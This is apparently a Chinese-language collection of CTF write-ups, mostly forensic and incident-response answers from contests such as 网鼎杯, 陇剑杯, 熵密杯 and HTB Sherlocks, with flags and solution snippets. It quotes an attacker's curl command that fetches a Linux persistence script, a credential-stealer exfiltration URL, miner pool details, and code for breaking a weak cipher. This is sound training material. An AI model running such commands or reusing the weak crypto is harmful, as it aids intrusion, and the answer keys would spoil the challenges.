强网杯

第八届强网杯线上赛

Web

第八届强网杯青少年专项赛

Crypto

Clasics

This task introduces you to CyberChef and various simple and classic encryption and encoding techniques.

知识点：古典密码、Base64、Base32、Atbash、ROT13、维吉尼亚密码

CyberChef

FLAG：flag{2834d185-a1da-4fb1-8bac-59076eb6a634}

网鼎杯

2024第四届“网鼎杯”网络安全大赛半决赛

第四届“网鼎杯”网络安全大赛半决赛采用“专项技术挑战赛（夺旗赛）”、“安全运营挑战赛（综合防御赛）”及“风险隐患挖掘赛（靶场渗透赛）”三种赛制相融合的竞技方式。

专项技术挑战赛

考察参赛战队在网络安全领域的技术能力，包括逆向安全、二进制安全、密码学、数据安全及新技术应用（如车联网、物联网、5G 通信），通过解题获取 flag 得分。

二进制安全

系统内核漏洞挖掘 - Generic_kernel_shellcode

Write a generic linux kernel shellcode?

密码学

序列密码加密分析 - noise

Let me tell you a story about noisy-nfsr.

数据安全

邮件数据分析

公司的 DLP 软件报警了，并上传了一段流量。你能帮 bob 分析下为什么会产生报警么？

数据安全协议分析

自定义 TLS 协议可能会存在安全问题，本题实现 TLS 的 Hello 部分，再利用 AES CFB 模式的性质伪造签名后的消息。端口为 23333，nc 正常无法连接上，需要根据 server 实现客户端链接。

新技术应用

车联网日志分析 - V2XLogAnalysis

车内日志的秘密，日志也能注入？

https://www.bilibili.com/opus/1004129835910430736

难道这是真正的登陆入口吗？

5G 网络隐私保护 - Get_supi

在某些场景下，LTE 网络中用户的 IMSI 会在空口暴露，5G 网络是如何进行隐私保护的？网络侧如何得到用户的 SUPI？（提交请加上 flag{}）

逆向安全

网络通信流量分析 - socket

小鼎同学在日常运维排查中发现了异常通信流量，通过初步定位分析，他获得了客户端、服务端程序以及相关流量，请帮他找出其中异常敏感数据！

安全运营挑战赛

在本题目中勒索软件样本为真实样本，请选手一定在虚拟环境中分析，不要在物理机中有任何分析操作，如若造成物理机及数据被加密或损坏，造成损失由选手个人承担，主办方不承担任何责任。

考察参赛战队在典型网络环境中的安全运营能力，包括加固修复、应急响应等任务，通过完成靶机上的对应运营任务得分。

加固修复

SSH 服务于 22 端口，账号 user，密码 123456

01 加强SSH服务的安全性

为了防止SSH服务被暴力破解攻击，应禁用密码登录并改用密钥认证。请在Linux服务器上为root用户配置以下公钥以进行验证ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEhw/9RBAh4qW36/LZXn80sLIZhq2hAJ7qY9KhzfJ3rW

ssh-keygen -t ed25519

vim /etc/ssh/sshd_config

02 配置Nginx重定向和HSTS

配置Linux服务器的Nginx服务，将所有站点的HTTP请求重定向到HTTPS，并配置严格传输安全策略（HSTS），以确保客户端与服务器之间的通信安全。

03 启用Web应用防火墙

为Nginx服务的默认站点启用ModSecurity Web应用防火墙，并集成OWASP核心规则集（CRS），以防御常见的Web攻击和漏洞利用。

04 加强防火墙策略

配置Linux服务器的防火墙，使其仅允许通过以下端口的访问：22/tcp（SSH）、53/tcp和53/udp（DNS）、80/tcp（HTTP）、443/tcp（HTTPS）。关闭其他不必要的端口，减少攻击面。

05 优化Kubernetes RBAC权限

配置App1应用的Kubernetes RBAC权限，只允许读取App1应用命名空间下所有Pods的信息，防止越权访问其他命名空间的资源。

应急响应

ssh 服务于 22 端口，账号 root，密码 FD7!#fd8s web 服务于 80 端口，账号 admin，密码 JD67s@!#l

01 查明并处理植入的后门

公司Web业务系统遭受黑客攻击，并被植入后门。请您立即进行排查和处理，确保系统的安全性和完整性。

02 定位持久化服务和木马文件

找到Linux服务器中驻留的持久化服务，并将持久化技术所依赖的二进制木马文件复制到/home/user/checker目录中。

04 发现并提取隐藏的进程

找到 Linux 服务器中隐藏的进程，并将该进程的二进制文件复制到 /home/user/checker 目录中，为后续分析提供依据。

05 查找被删除的勒案软件名称

找到攻击者被记录的删除加密勒索软件的痕迹，尝试恢复分析该勒索软件并提交勒索软件十六进制格式的加密密钥到/home/user/checker/key.txt文件中，以便于解密攻击者勒索的文件。

06 恢复被加密的数据

恢复服务器上被勒索软件加密的分区数据到/home/user/checker目录，确保业务数据的完整性和可用性。

07 查明并处理篡改的首页

公司Web业务系统首页遭受黑客攻击，并被植入恶意链接。请您立即进行排查和处理受影响的首页，确保系统的可用性、安全性和完整性。

威胁分析

ssh 服务于 22 端口，账号 root，密码 toor

01

在调查网络性能或安全问题时，了解特定应用程序在一段时间内的数据传输情况对于检测异常流量和潜在威胁至关重要。通过分析网络活动日志，我们可以确定是否存在数据泄露或异常通信。

请问，firefox进程自有记录以来一共发送了多少字节的数据？（请将答案编辑并存入/opt/wxfx/answer/1.txt文件中，参考/opt/wxfx/example目录）

02

识别安全防护软件的查杀记录，对于评估系统受感染的程度和了解攻击者所使用的工具至关重要。通过检查安全日志，可以获取被检测到的威胁信息。

请问，Windows Defender 检测到的第一个恶意软件的威胁ID是什么？（请将答案编辑并存入/opt/wxfx/answer/2.txt文件中，参考/opt/wxfx/example目录）

03

了解恶意软件的内部名称（如开发者给它的命名）有助于识别其家族、版本和特定功能，进而制定有效的防御策略。

请问，系统中正在运行的恶意软件的内部名称是什么？（请将答案编辑并存入/opt/wxfx/answer/3.txt文件中，参考/opt/wxfx/example目录）

04

逆向分析恶意软件时，确定其在进程内存中存储关键数据的位置，对于理解其工作机制和防范进一步的攻击非常重要。

请问，恶意软件在进程内存中存储密钥的内存地址是什么？（请将答案编辑并存入/opt/wxfx/answer/4.txt文件中，参考/opt/wxfx/example目录）

05

分析恶意软件的行为包括了解其在系统中启用了哪些权限，这有助于评估其潜在的危害和攻击范围。通过检查进程的权限列表，可以发现其可能执行的敏感操作。

请问，恶意软件在其进程中启用了多少个权限？（请将答案编辑并存入/opt/wxfx/answer/5.txt文件中，参考/opt/wxfx/example目录）

06

在分析勒索软件的行为时，确定其在内存中加载的位置对于深入理解其运行机制和发现潜在的漏洞非常重要。通过内存取证，可以找到打开勒索软件文件的设备的虚拟地址。

请问，打开勒索软件文件的设备的虚拟地址是什么（16进制）？（请将答案编辑并存入/opt/wxfx/answer/6.txt文件中，参考/opt/wxfx/example目录）

溯源反制

无接入信息，需要通过其他手段实现权限控制

02

尝试在攻击机上提升权限并在提升权限后在高级用户的家目录中留下862382.txt文件

风险隐患挖掘赛

考察参赛战队的渗透测试能力，在大型仿真场景中通过信息收集、漏洞扫描和利用获取系统权限或执行命令，找到 flag 提交得分。

参考资料

https://github.com/CTF-Archives/2024-wdb-Semis-IncidentResponse/

“陇剑杯”网络安全大赛

作为国家级网络安全大赛，“陇剑杯”是全国同类赛事中首个“以防为主”的赛事品牌，同时也是首次引入“人工智能人机对抗”的网络安全防御赛。

第三届“陇剑杯”网络安全大赛
第二届“陇剑杯”网络安全大赛
- 第二届“陇剑杯”网络安全大赛_2023_线上预选赛
首届“陇剑杯”网络安全大赛

第二届“陇剑杯”网络安全大赛线上预选赛

本次大赛延续首届“以防为主”的品牌特色，聚焦人工智能技术在安全防御场景中的应用，打造全场景网络安全防御演练场，吸引了全国 31 个省市区的 1681 支队伍、6724 人报名参赛。通过线上选拔，200 支队伍进入半决赛，120 支队伍进入决赛。

server save

解压密码为c77ad47ba4c85fae66f08ec12e0085dd

server save_3

黑客的病毒名称是什么？格式为：filename

.bash_history

/home/guests/main

FLAG：main

server save_4

黑客的病毒运行后创建了什么用户？请将回答用户名与密码：username:password

可以结合云沙箱

FLAG：ll:123456

server save_5

服务器在被入侵时外网ip是多少? 格式为：10.10.0.1

/home/guests/.log.txt

FLAG：172.105.202.239

server save_6

病毒运行后释放了什么文件？格式：文件1,文件2

FLAG：lolMiner ,mine_doge.sh

server save_7

矿池地址是什么？格式：domain:1234

mine_doge.sh

FLAG：doge.millpools.cc:5567

server save_8

黑客的钱包地址是多少？格式：xx:xxxxxxxx

FLAG：DOGE:DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9.lolMinerWorker

WS

附件下载提取码（GAME）备用下载

SSW

http and ip.addr ==192.168.77.135 and  ip.addr ==192.168.77.155

SmallSword_1

连接蚁剑的正确密码是______________?（答案示例：123asd）

FLAG：6ea280898e404bfabd0ebb702327b18f

SmallSword_2

攻击者留存的值是______________?(答案示例：d1c3f0d3-68bb-4d85-a337-fb97cf99ee2e)

第二次向 hacker.txt 写内容

FLAG：ad6269b7-3ce2-4ae8-b97f-f259515e7a91

SmallSword_3

攻击者下载到的flag是______________?(答案示例：flag3{uuid})

导出 exe 文件，运行后获取 jpg 图片，修复文件后得 flag。

FLAG：flag3{8f0dffac-5801-44a9-bd49-e66192ce4f57}

EW

ez_web_1

服务器自带的后门文件名是什么？（含文件后缀）

FLAG：ViewMore.php

ez_web_3

攻击者往服务器中写入的key是什么？

解压密码为7e03864b0db7e6f9

FLAG：7d9ddff2-2d67-4eba-9e48-b91c26c42337

BF

本题附件见于平台公告的 BF.zip，解压密码为 4cf611fce4a2fec305e54c2766b7c860

题目给出了两个文件，分别是磁盘镜像文件baby_forensics.vmdk、内存文件baby_forensics.raw。

baby_forensics_1

磁盘中的key是多少？

key.txt E96<6J:Da6g_b_f_gd75a3d4ch4heg4bab66ad5d进行 ROT47 解密。

FLAG：2e80307085fd2b5c49c968c323ee25d5

baby_forensics_3

该内存文件中存在的flag值是多少？

一般便签的数据保存目录是在 C:\Users\当前的账户用户名\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt 文件，需将原文件删除，并将我们的文件重命名。

U2FsdGVkX195MCsw0ANs6/Vkjibq89YlmnDdY/dCNKRkixvAP6+B5ImXr2VIqBSp
94qfIcjQhDxPgr9G4u++pA==

qwerasdf

使用 CryptoJS 实现的在线网站解密，如https://tool.oschina.net/encrypt/

或者使用 openssl 解密

echo "U2FsdGVkX195MCsw0ANs6/Vkjibq89YlmnDdY/dCNKRkixvAP6+B5ImXr2VIqBSp94qfIcjQhDxPgr9G4u++pA==" | openssl enc -d -aes-256-cbc -md md5 -base64 -pass pass:qwerasdf

FLAG：flag{ad9bca48-c7b0-4bd6-b6fb-aef90090bb98}

CISCN

第十八届全国大学生信息安全竞赛（创新实践能力赛）线上初赛

ISCC

ISCC 2025

ISCC 2024

ISCC 2023

ISCC 2022

能源网络安全大赛

2025年能源网络安全大赛预赛

2024年能源网络安全大赛团体决赛

2024 年 6 月 20 日以线下赛形式在江苏宜兴举办了 2024 年能源网络安全大赛团体决赛、个人决赛。

关于2024年能源网络安全大赛团体决赛结果的公示

赛题附件：百度网盘

能源管理后门查杀

能源管理系统Web应用框架被攻击者留下了后门，请定位分析后清理相关后门程序。

附件下载

FLAG 为flag{}

2024年能源网络安全大赛个人决赛

2024 年 6 月 20 日以线下赛形式在江苏宜兴举办了 2024 年能源网络安全大赛团体决赛、个人决赛。

关于2024年能源网络安全大赛团体决赛结果的公示

赛题附件：百度网盘

Forensic

APT窃密事件溯源

某单位遭遇威胁组织攻击，威胁组织对攻陷的主机进行了信息收集并窃取机密信息，安防设备捕获到攻击流量（hack.pcap），结合提供的开源APT分析报告，研判发起本次攻击事件的APT组织窃取的文件。flag格式为flag{}

知识点：流量分析

附件下载

FLAG：flag{C:\Users\wdr\Desktop\test\888888888.txt}

失窃的MP4文件

已知黑客入侵某内部系统后，使用自定义的协议格式回传窃取的高价值mp4文件，请针对目标流量还原被窃取文件，找到flag标识，格式：flag{XXXX_XXXX_XXXX_XXXX}

附件下载

FLAG：flag{}

寻找矿池地址

请分析服务器（root/Root@123)被挖矿的地址连接池，找到域名和端口，flag为flag{域名:端口},flag格式为flag{xxxx}

在线环境，无附件。

FLAG：flag{www.baiiduu.com:3333}

ICS

modbus

先运行服务器再运行客户端，产生流量。找到流量中的flag

附件下载

FLAG：flag{sgcc_modbus_hack}

104协议

题目描述

提示 1：
提示 2：

知识点：流量分析、工控流量分析、IEC 60870-104协议

解题步骤、关键截图、代码

tshark -r 104_2.pcapng -T fields -e "iec60870_asdu.ioa"

ZmxhZ3syMDI0bnlhcWdmenNsfQ==

FLAG：flag{2024nyaqgfzsl}

这是一个秘密

提示 1：
提示 2：

知识点：流量分析、工控流量分析、s7comm协议

解题步骤、关键截图、代码

YWx3YXlzZm9yd2FyZCEh

FLAG：flag{alwaysforward!!}

NYWL2024002

附件是一个PLC项目文件以及相关的截图，请分析里面的PLC程序，求MDO的值为多少时可使MD4的值为9498.563，flag为MD0的值，flag格式为flagt{xxx},例如MD0的值是123，那么flag就是flag{123}

附件下载

FLAG 为flag{}

data-encry

编译文件，执行文件，获取flag,flag格式flag{xxx}

附件下载

kqfl{xlhh-djx-qqar}，使用 CyberChef 的ROT13_Brute_Force模块爆破即可。

FLAG：flag{sgcc-yes-llvm}

2024年能源网络安全大赛预赛

题目概览

能源安全杂项

Modbus

奇怪的流量

tshark -r modbus.pcapng  -Y modbus -T fields -e modbus.regval_uint16

去除 65535

FLAG：flag{ee92722f-973c-46c9-a05e-d5e9f3540529}

熵密杯

此次挑战赛由中国密码学会、重庆市密码管理局指导，国家信息技术安全研究中心主办，采取线下赛闯关模式，模拟重要系统典型密码应用场景，参赛战队通过发现典型场景中存在的密码算法模式配置、密钥管理、密码协议、密码服务、网络安全等方面密码应用安全缺陷和网络安全漏洞，综合检验各个战队密码应用常见安全缺陷的分析识别、密码算法等功能调用的编程实现、网络协议数据包分析及相关工具使用、网络和系统配置检查、源代码审计等技能水平。¹

来自全国 31 个省（自治区、直辖市）的 600 余名密码专业技术人才，组成 205 支战队，同场竞技，紧贴智能网联汽车典型密码应用场景，围绕预设的密码算法、密钥管理、密码协议等安全缺陷，闯关夺旗。²

2024年第二届熵密杯密码安全挑战赛

此次赛事由中国密码学会、宁夏回族自治区密码管理局、中国科学院大学密码学院支持，国家信息技术安全研究中心联合密码科技国家工程研究中心主办，采取线下赛方式，通过模拟仿真重要行业领域密码应用典型场景，预置密码算法模式配置、密钥管理、密码协议、密码服务、网络安全等方面密码应用安全缺陷和网络安全漏洞,综合检验参赛队伍在密码应用安全缺陷识别、密码算法功能编程调用、网络协议数据解析、网络和系统配置核查、源代码审计等方面的实战技能。[^2024-公告]

本届赛事召集了来自全国 29 个省区市的 50 家知名高校、91 家测评机构、8 家安全企业，共计 448 名密码专业技术人才参赛。

中国科学技术大学“Nebula 战队”一骑绝尘，拔得头筹，豪取冠军并获特等奖。卫冕冠军上海交通大学“0ops 战队”凭借后程发力，强势逆转勇夺亚军，携吉林大学“Spirit 战队”、西北大学“NwuSec 战队”、山东大学“HASHTEAM 战队”分获一等奖。浙江大学“来自东方的神秘力量”等 5 支战队获二等奖。10 支战队获三等奖。30 支战队获优胜奖。

[^2024-公告]：关于举办第二届“熵密杯”密码应用安全挑战赛公告

2023年首届熵密杯密码应用安全竞赛

由中国密码学会支持，2023 商用密码大会执委会主办，南京赛宁信息技术有限公司提供技术支撑的首届“熵密杯”密码应用安全竞赛于 8 月 10 日在郑州举办。

2025年第三届熵密杯密码安全挑战赛

参考资料

WriteUp | 第三届“熵密杯”密码安全挑战赛解题思路分享

2024年第二届熵密杯密码安全挑战赛

积分板

题目背景

你是一位公司内部工作人员，你们公司最近上线了一个协同签名系统，所有重要事项由总经理通过该系统进行签名确认。有一天，你无意中接触到后台系统管理员的房间，里面有一台未上锁的电脑，其中似乎有着可以接触到公司关键操作的线索。

最终目标

你需要利用你的技能和智慧，利用所有可能的线索，搜寻系统中密码应用潜在的漏洞，最终实现完成一次“非法”的签名！

注意：你并不是恶意黑客，你的目的是测试系统的安全性，找出可能存在的密码应用漏洞，以便系统开发人员加强系统防御措施。

解题路径

本次竞赛共设置初始谜题和夺旗闯关两个环节，其中初始谜题设置 3 道题，闯关夺旗设置 5 道题，共计 8 道题。

题目拓扑

初始谜题

初始谜题1

请下载题目附件，并获取在线场景，双击运行附件中的客户端，输入IP地址和端口号连接服务端。请认真分析题目附件中的代码，根据服务端所给出的密文，解密出所对应的明文消息，并提交至服务端。

from sympy import Mod, Integer
from sympy.core.numbers import mod_inverse

# 模数
N_HEX = "FFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123"
MODULUS = Integer(int(N_HEX, 16))
MSG_PREFIX = "CryptoCup message:"


# 加密函数
def encrypt_message(message, key):
    # 添加前缀
    message_with_prefix = MSG_PREFIX + message
    message_bytes = message_with_prefix.encode('utf-8')
    message_len = len(message_bytes)
    num_blocks = (message_len + 15) // 16
    blocks = [message_bytes[i * 16:(i + 1) * 16] for i in range(num_blocks)]

    # 进行0填充
    blocks[-1] = blocks[-1].ljust(16, b'\x00')

    encrypted_blocks = []

    k = key

    # 加密每个分组
    for block in blocks:
        block_int = int.from_bytes(block, byteorder='big')
        encrypted_block_int = Mod(block_int * k, MODULUS)
        encrypted_blocks.append(encrypted_block_int)
        k += 1  # 密钥自增1

    # 将加密后的分组连接成最终的密文
    encrypted_message = b''.join(
        int(block_int).to_bytes(32, byteorder='big') for block_int in encrypted_blocks
    )

    return encrypted_message


# 解密函数
def decrypt_message(encrypted_message, key):
    num_blocks = len(encrypted_message) // 32
    blocks = [encrypted_message[i * 32:(i + 1) * 32] for i in range(num_blocks)]

    decrypted_blocks = []

    k = key

    # 解密每个分组
    for block in blocks:
        block_int = int.from_bytes(block, byteorder='big')
        key_inv = mod_inverse(k, MODULUS)
        decrypted_block_int = Mod(block_int * key_inv, MODULUS)
        decrypted_blocks.append(decrypted_block_int)
        k += 1  # 密钥自增1

    # 将解密后的分组连接成最终的明文
    decrypted_message = b''.join(
        int(block_int).to_bytes(16, byteorder='big') for block_int in decrypted_blocks
    )

    # 去除前缀
    if decrypted_message.startswith(MSG_PREFIX.encode('utf-8')):
        decrypted_message = decrypted_message[len(MSG_PREFIX):]

    return decrypted_message.rstrip(b'\x00').decode('utf-8')


# 测试
initial_key = Integer(0x123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0)
message = "Hello, this is a test message."
print("Original Message:", message)

# 加密
encrypted_message = encrypt_message(message, initial_key)
print("Encrypted Message (hex):", encrypted_message.hex())

# 解密
decrypted_message = decrypt_message(encrypted_message, initial_key)
print("Decrypted Message:", decrypted_message)

已知密文为a7ea042608ffce5be79a19ee45533506819e85f8d9250fccef5a89731151fd7a76d83aa85c47ba1357a86d0e9763470fb608cd54d0927125f500353e156a01da759fa814e96fa41a888eea3a9cf9b062923ed70774add490c7ed7f83d6b47e711e7b3c8a960dcc2838e577459bb6f2769d0917e1fd57db0829633b77652c2180

方法一：通过动态调试计算获取 key

...
# 动态调试获取第一块明文和密文
m = 89652660640613347754090896429354803559
c = 75949716558974720160457011444725356343804438342271795660520482736366924463482

# 计算密钥
key = Mod(c * mod_inverse(m, MODULUS), MODULUS)
print("Key:", hex(int(key)))
# Key: 0xfb85e511115f381827f03b1cef8e6d52a5c920f8e9e285cc842b3e6ddf935b78

# 解密
encrypted_message = bytes.fromhex("a7ea042608ffce5be79a19ee45533506819e85f8d9250fccef5a89731151fd7a76d83aa85c47ba1357a86d0e9763470fb608cd54d0927125f500353e156a01da759fa814e96fa41a888eea3a9cf9b062923ed70774add490c7ed7f83d6b47e711e7b3c8a960dcc2838e577459bb6f2769d0917e1fd57db0829633b77652c2180")
decrypted_message = decrypt_message(encrypted_message,key=Integer(0xfb85e511115f381827f03b1cef8e6d52a5c920f8e9e285cc842b3e6ddf935b78))
print("Decrypted Message:", decrypted_message)
# Decrypted Message: dHyNBCgxEq4prNBbxjDOiOgmvviuAgfx

方法二：静态分析

# 将十六进制密文转换为字节
cipher_bytes = bytes.fromhex("a7ea042608ffce5be79a19ee45533506819e85f8d9250fccef5a89731151fd7a76d83aa85c47ba1357a86d0e9763470fb608cd54d0927125f500353e156a01da759fa814e96fa41a888eea3a9cf9b062923ed70774add490c7ed7f83d6b47e711e7b3c8a960dcc2838e577459bb6f2769d0917e1fd57db0829633b77652c2180")
    
# 提取第一个密文块（32字节）
first_cipher_block = cipher_bytes[:32]
c0 = int.from_bytes(first_cipher_block, byteorder='big')
    
# 构造明文第一个块（前缀的前16字节）
message_with_prefix = MSG_PREFIX.encode('utf-8')
first_plain_block = message_with_prefix[:16]  # 取前16字节
m0 = int.from_bytes(first_plain_block, byteorder='big')
    
# 计算m0在模MODULUS下的逆元
m0_inv = mod_inverse(m0, MODULUS)
    
# 计算初始密钥: k = c0 * m0_inv mod MODULUS
k = (c0 * m0_inv) % MODULUS

初始谜题2

请下载题目附件，并获取在线场景，双击运行附件中的客户端，输入IP地址和端口号连接服务端。请认真分析题目附件中的代码，根据服务端所给出的counter和token，伪造出一个可以通过验证的counter和token，并提交至服务端。

题目源代码：

import binascii
from gmssl import sm3


# 读取HMAC key文件
def read_hmac_key(file_path):
    with open(file_path, 'rb') as f:
        hmac_key = f.read().strip()
    return hmac_key


# 生成token
def generate_token(hmac_key, counter):
    # 如果HMAC_KEY长度不足32字节，则在末尾补0，超过64字节则截断
    if len(hmac_key) < 32:
        hmac_key = hmac_key.ljust(32, b'\x00')
    elif len(hmac_key) > 32:
        hmac_key = hmac_key[:32]

    # 将计数器转换为字节表示
    counter_bytes = counter.to_bytes((counter.bit_length() + 7) // 8, 'big')
    # print("counter_bytes:", binascii.hexlify(counter_bytes))

    tobe_hashed = bytearray(hmac_key + counter_bytes)

    # print("tobe_hashed:", binascii.hexlify(tobe_hashed))

    # 使用SM3算法计算哈希值
    sm3_hash = sm3.sm3_hash(tobe_hashed)

    # 将SM3的哈希值转换为十六进制字符串作为token
    token = sm3_hash

    return token


current_counter = 0


def verify_token(hmac_key, counter, token):
    # 生成token
    generated_token = generate_token(hmac_key, counter)
    global current_counter
    # 比较生成的token和输入的token是否相同
    if generated_token == token:
        if counter & 0xFFFFFFFF > current_counter:
            current_counter = counter & 0xFFFFFFFF
            print("current_counter: ", hex(current_counter))
            return "Success"
        else:
            return "Error: counter must be increasing"
    else:
        return "Error: token not match"


# 假设HMAC key文件路径
hmac_key_file = 'hmac_key.txt'
# 假设计数器值
counter = 0x12345678

# 读取HMAC key
hmac_key = read_hmac_key(hmac_key_file)

# 生成token
token = generate_token(hmac_key, counter)
print("Generated token:", token)
print(verify_token(hmac_key, counter, token))

知识点：SM3长度扩展攻击

初始谜题3

请下载题目附件，并获取在线场景，双击运行附件中的客户端，输入IP地址和端口号连接服务端。请认真分析题目附件中的代码，根据服务端所给出的公钥和密文，解密出所对应的明文消息，并提交至服务端。

题目源代码：

知识点：LWE

夺旗闯关

参考资料

2023年首届熵密杯密码应用安全竞赛

picoCTF

picoCTF 2025

picoCTF 2024

picoCTF 2023

picoCTF 2022

picoCTF 2021

HTB

HTB Sherlocks Brutus

题目附件：下载地址

解压密码：hacktheblue

官方 Writeup

任务1

分析 auth.log。攻击者用于进行暴力破解的 IP 地址是什么？（x.x.x.x）

检索关键词 Failed password

FLAG：65.2.161.68

任务2

暴力破解尝试已成功，攻击者获得了服务器上某个账户的访问权限。该账户的用户名是什么？（***t）

检索关键词 Accepted password

FLAG：root

任务3

确定攻击者手动登录服务器并建立终端会话以执行其目标的 UTC 时间戳。登录时间与认证时间不同，可在 wtmp 工件中找到。（YYYY-MM-DD HH:MM:SS）

使用 last 命令

$ last -f wtmp -F
cyberjun pts/1        65.2.161.68      Wed Mar  6 14:37:35 2024   gone - no logout
root     pts/1        65.2.161.68      Wed Mar  6 14:32:45 2024 - Wed Mar  6 14:37:24 2024  (00:04)
root     pts/0        203.101.190.9    Wed Mar  6 14:19:55 2024   gone - no logout
reboot   system boot  6.2.0-1018-aws   Wed Mar  6 14:17:15 2024   still running
root     pts/1        203.101.190.9    Sun Feb 11 18:54:27 2024 - Sun Feb 11 19:08:04 2024  (00:13)
root     pts/1        203.101.190.9    Sun Feb 11 18:41:11 2024 - Sun Feb 11 18:41:46 2024  (00:00)
root     pts/0        203.101.190.9    Sun Feb 11 18:33:49 2024 - Sun Feb 11 19:08:04 2024  (00:34)
root     pts/0        203.101.190.9    Thu Jan 25 19:15:40 2024 - Thu Jan 25 20:34:34 2024  (01:18)
ubuntu   pts/0        203.101.190.9    Thu Jan 25 19:13:58 2024 - Thu Jan 25 19:15:12 2024  (00:01)
reboot   system boot  6.2.0-1017-aws   Thu Jan 25 19:12:17 2024 - Sun Feb 11 19:09:18 2024 (16+23:57)

wtmp begins Thu Jan 25 19:12:17 2024

使用提供的脚本

python3 utmp.py wtmp -o wtmp.out

FLAG：2024-03-06 06:32:45

任务4

SSH 登录会话在登录时会被跟踪并分配一个会话编号。对于问题 2 中该用户账户的攻击者会话，被分配的会话编号是多少？（XX）

Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.

FLAG：37

任务5

攻击者在服务器上作为其持久化策略的一部分添加了一个新用户，并为该新用户账户赋予了更高的权限。该账户的名称是什么？

FLAG：cyberjunkie

任务6

通过创建新账户进行持久化所对应的 MITRE ATT&CK 子技术编号是什么？（TXXXX.XXX）

FLAG：T1136.001

任务7

根据 auth.log，攻击者的首次 SSH 会话在何时结束？（YYYY-MM-DD HH:MM:SS）

FLAG：2024-03-06 06:37:24

任务8

攻击者登录其后门账户并利用更高权限下载了一个脚本。使用 sudo 执行的完整命令是什么？

FLAG：/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

HTB Sherlocks Bumblebee

题目附件：下载地址

解压密码：hacktheblue

官方 Writeup

https://sqlitebrowser.org/

任务1

外部承包商的用户名是什么？

FLAG：apoole1

任务2

承包商使用了哪个 IP 地址创建他们的账户？

FLAG：10.10.0.78

任务3

承包商发布的恶意帖子其 post_id 是多少？

FLAG：9

任务4

凭据窃取程序将其数据发送到的完整 URI 是什么？

FLAG：http://10.10.0.78/update.php

任务5

承包商何时以管理员身份登录论坛？（UTC）

FLAG：26/04/2023 10:53:12

任务6

论坛中存在用于 LDAP 连接的明文凭据，密码是什么？

表 phpbb_config

FLAG：Passw0rd1

任务7

管理员用户的 User-Agent 是什么？

过滤管理员的 IP 10.255.254.2

10.255.254.2 - - [25/Apr/2023:12:08:42 +0100] "GET /adm/index.php?sid=ac1490e6c806ac0403c6c116c1d15fa6&i=12 HTTP/1.1" 403 9412 "http://10.10.0.27/adm/index.php?sid=ac1490e6c806ac0403c6c116c1d15fa6&i=1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"

FLAG：Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36

任务8

承包商在何时将自己添加到管理员组？（UTC）

FLAG：26/04/2023 10:53:51

任务9

承包商在何时下载了数据库备份？（UTC）

10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

FLAG：26/04/2023 11:01:38